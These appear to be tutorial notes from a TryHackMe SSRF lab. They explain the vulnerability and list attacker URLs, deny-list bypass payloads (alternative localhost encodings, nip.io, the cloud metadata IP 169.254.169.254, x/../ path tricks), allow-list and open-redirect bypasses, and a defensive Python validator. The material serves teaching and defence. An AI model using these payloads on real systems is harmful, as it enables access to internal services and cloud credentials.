Tutorials

Explanation

#exploitation #web

SSRF (Server-Side Request Forgery) is a vulnerability that lets an attacker make the server issue an additional HTTP request, or modify one it already makes.

Two types of SSRF:

  • Regular SSRF = the attack returns the response to the attacker's screen
  • Blind SSRF = the attack returns no response to the screen

This attack gives access to information that is normally not accessible.

"&x=" is a payload used to terminate the path of the URL (whatever the application appends afterwards lands in a dummy query parameter instead of the path).

SSRF vulnerabilities can be found in a web app in several ways:

  • When a full URL is used as a parameter in the address bar:
https://website.thm/form?server=http://server.website.thm/store
  • A hidden value in a form:

```html
<form method="post" action="/form">
  <input type="hidden" name="server" value="http://server.website.thm/store">
  <div>Your name:</div>
  <!-- etc... -->
</form>
```

  • A partial URL inserted as the hostname:
https://website.thm/form?server=api
  • Only the path of a URL:
https://website.thm/form?dst=/forms/contact

Example 1:

WHAT THE SITE EXPECTS:

http://website.thm/stock?url=http://api.website.thm/api/stock/item?id=123

WHAT THE ATTACKER WRITES:

http://website.thm/stock?url=http://api.website.thm/api/user

Example 2:

WHAT THE SITE EXPECTS:

http://website.thm/stock?url=/item?id=123

WHAT THE ATTACKER WRITES:

http://website.thm/stock?url=/../user

Example 3:

WHAT THE SITE EXPECTS:

http://website.thm/stock?server=api&id=123

WHAT THE ATTACKER WRITES:

http://website.thm/stock?server=api.website.thm/api/user&x=&id=123

Example 4:

WHAT THE SITE EXPECTS:

http://website.thm/stock?url=http://api.website.thm/api/stock/item?id=123

WHAT THE ATTACKER WRITES:

http://website.thm/stock?url=http://hacker-domain.thm/

If working with a blind SSRF where no output is reflected back to you, you'll need to use an external HTTP logging tool to monitor requests such as requestbin.com, your own HTTP server or Burp Suite's Collaborator client.

HOW TO BYPASS THE WEB APP'S SSRF CHECKS:

Deny List

A Deny List is where all requests are accepted apart from resources specified in a list or matching a particular pattern. A Web Application may employ a deny list to protect sensitive endpoints, IP addresses or domains from being accessed by the public while still allowing access to other locations. A specific endpoint to restrict access is the localhost, which may contain server performance data or further sensitive information, so domain names such as localhost and 127.0.0.1 would appear on a deny list. Attackers can bypass a Deny List by using alternative localhost references such as 0, 0.0.0.0, 0000, 127.1, 127.*.*.*, 2130706433, 017700000001 or subdomains that have a DNS record which resolves to the IP Address 127.0.0.1 such as 127.0.0.1.nip.io.

Also, in a cloud environment, it would be beneficial to block access to the IP address 169.254.169.254, which contains metadata for the deployed cloud server, including possibly sensitive information. An attacker can bypass this by registering a subdomain on their own domain with a DNS record that points to the IP Address 169.254.169.254.

x/../private = a way to bypass the deny list. The site told us the image URL could not start with private, so we used the payload "x/../" to bypass the check (the check only looks at the start of the string, not at the path after the ../ is resolved).

Allow List

An allow list is where all requests get denied unless they appear on a list or match a particular pattern, such as a rule that a URL used in a parameter must begin with https://website.thm. An attacker could quickly circumvent this rule by creating a subdomain on an attacker's domain name, such as https://website.thm.attackers-domain.thm. The application logic would now allow this input and let an attacker control the internal HTTP request.
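As an added example (not part of these notes or of the TryHackMe room), a Python check that contrasts the string-comparison deny list from the Deny List section with a hardened allow-list validator: it normalises the alternative localhost spellings listed above (127.1, 2130706433, 017700000001, 0), rejects the cloud metadata address, matches the host exactly so website.thm.attackers-domain.thm fails, and resolves the "x/../" path trick before any prefix check. The host names and the policy are assumptions.

```python
import ipaddress
import posixpath
import socket
from urllib.parse import urlsplit

# Hypothetical policy for the stock-lookup endpoint in the notes: the only host
# the server should ever fetch from is its own API host (assumed name).
ALLOWED_HOSTS = {"api.website.thm"}
# The kind of deny list the notes describe; it only knows the canonical spellings.
DENY_LIST = {"localhost", "127.0.0.1"}

def weak_is_safe(url: str) -> bool:
    """Deny-list check as it is often written: a string comparison on the hostname."""
    host = urlsplit(url).hostname or ""
    return host not in DENY_LIST

def as_ip_literal(host: str):
    """Address denoted by an IP literal in any form (dotted quad, IPv6, or the legacy
    127.1 / 2130706433 / 017700000001 / 0 forms that inet_aton also accepts), else None."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None

def strict_is_safe(url: str) -> bool:
    """Allow-list check: exact hostname match, plus rejection of any non-public IP
    literal as defence in depth. A production version must also resolve the hostname
    and apply the same address check to the result (nip.io, attacker subdomains,
    rebinding); that needs DNS, so it is left out of this offline example."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname.rstrip(".").lower()
    ip = as_ip_literal(host)
    if ip is not None:
        # loopback, 0.0.0.0, link-local (169.254.169.254) and RFC 1918 all fail is_global
        return ip.is_global
    return host in ALLOWED_HOSTS

def normalised_path(path: str) -> str:
    """Collapse ../ segments before any prefix check, so "x/../private" is seen as
    "/private" and "/../user" as "/user"."""
    return posixpath.normpath("/" + path.lstrip("/"))
```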

Open Redirect

If the above bypasses do not work, there is one more trick up the attacker's sleeve, the open redirect. An open redirect is an endpoint on the server where the website visitor gets automatically redirected to another website address. Take, for example, the link https://website.thm/link?url=https://tryhackme.com. This endpoint was created to record the number of times visitors have clicked on this link for advertising/marketing purposes. But imagine there was a potential SSRF vulnerability with stringent rules which only allowed URLs beginning with https://website.thm/. An attacker could utilise the above feature to redirect the internal HTTP request to a domain of the attacker's choice.